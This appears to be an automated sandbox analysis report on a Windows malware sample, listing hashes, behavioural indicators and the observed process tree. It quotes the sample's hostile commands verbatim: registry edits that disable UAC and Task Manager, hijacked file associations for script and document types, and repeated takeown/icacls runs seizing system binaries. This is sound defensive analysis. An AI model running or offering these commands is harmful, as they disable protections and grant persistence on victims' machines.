Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system -
submitted
07-11-2024 11:24
Static task
static1
Behavioral task
behavioral1
Sample
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Resource
win10v2004-20241007-en
General
-
Target
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
-
Size
409KB
-
MD5
b23232263d0ff718419df3180d3d8670
-
SHA1
194d700b79d7ffa681aaad1fd5010d788a4713ee
-
SHA256
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781
-
SHA512
7c478b9cf4556539d8cd2a9165d11558a9957f7dc9ae25bd2380c02fa01e37061b6e5717d978eae87e7b074524b390d7f6a78d238240e3e1ffc45a259227c553
-
SSDEEP
6144:YQMmbjV28okoS4oImBvIEtTawRbvbKw4IPCFRvzvU+Yrw:YWoioS/Z6H
Malware Config
Signatures
-
Processes: reg.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
-
Modifies file permissions 1 TTPs 64 IoCs
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes: ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe BATCF %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes: ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
description | ioc | process
File opened for modification | C:\Windows\System32\Taskmgr.exe | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
Processes: ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe BATCF %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe HTMWF %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe RTFDF %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe NTPAD %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe NTPAD %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe NTPAD %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe CMDSF %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe JPGIF %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe VBSSF %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe NTPAD %1" | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
pid | process
4880 | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
-
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes: ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe, takeown.exe
description | pid | process
Token: SeDebugPrivilege | 4880 | ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Token: SeTakeOwnershipPrivilege | 4500 | takeown.exe
Token: SeTakeOwnershipPrivilege | 3504 | takeown.exe
Token: SeTakeOwnershipPrivilege | 4748 | takeown.exe
Token: SeTakeOwnershipPrivilege | 1080 | takeown.exe
Token: SeTakeOwnershipPrivilege | 5028 | takeown.exe
Token: SeTakeOwnershipPrivilege | 3064 | takeown.exe
Token: SeTakeOwnershipPrivilege | 2700 | takeown.exe
Token: SeTakeOwnershipPrivilege | 4116 | takeown.exe
Token: SeTakeOwnershipPrivilege | 3460 | takeown.exe
Token: SeTakeOwnershipPrivilege | 2760 | takeown.exe
Token: SeTakeOwnershipPrivilege | 1616 | takeown.exe
Token: SeTakeOwnershipPrivilege | 1844 | takeown.exe
Token: SeTakeOwnershipPrivilege | 4528 | takeown.exe
Token: SeTakeOwnershipPrivilege | 1544 | takeown.exe
Token: SeTakeOwnershipPrivilege | 868 | takeown.exe
Token: SeTakeOwnershipPrivilege | 4488 | takeown.exe
Token: SeTakeOwnershipPrivilege | 1108 | takeown.exe
Token: SeTakeOwnershipPrivilege | 2040 | takeown.exe
Token: SeTakeOwnershipPrivilege | 3280 | takeown.exe
Token: SeTakeOwnershipPrivilege | 2904 | takeown.exe
Token: SeTakeOwnershipPrivilege | 1308 | takeown.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe"C:\Users\Admin\AppData\Local\Temp\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe"1⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:3172 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:3628 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\bfsvc.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4500 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4560 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\HelpPane.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3844 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\hh.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3504 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1940 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\splwow64.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2196
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\winhlp32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1032
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\write.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3680 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2520
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\msra.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2760 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3524
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2568
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3892 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3460 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4568 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\logagent.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:1844 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3440
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1544 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3164
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:4528 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1468 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4784 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:4488 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4964
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4620
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\runas.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:980 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2904 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3556 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3280 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1236
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1308 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3916
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3328
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3312 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4468
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3260
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:3248 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2472
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1732 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4336
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3412
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3140
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3004
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4540
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3348
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5004 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4452
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2580
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:224
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1464 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:5112
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1196
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2680 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1472 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:4276 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4280 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2340
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2216
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1800 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3452
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:3608 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3088 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1876 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1524
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1556 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1212 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3896 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4000
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3604
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4332
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:4888 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4156
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3936
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4432
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4056
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4484 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2924
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:928 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2104 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1700 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2024 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4424
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4844
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1668
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2712 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3924 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1612 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2076 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2820 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2784
-
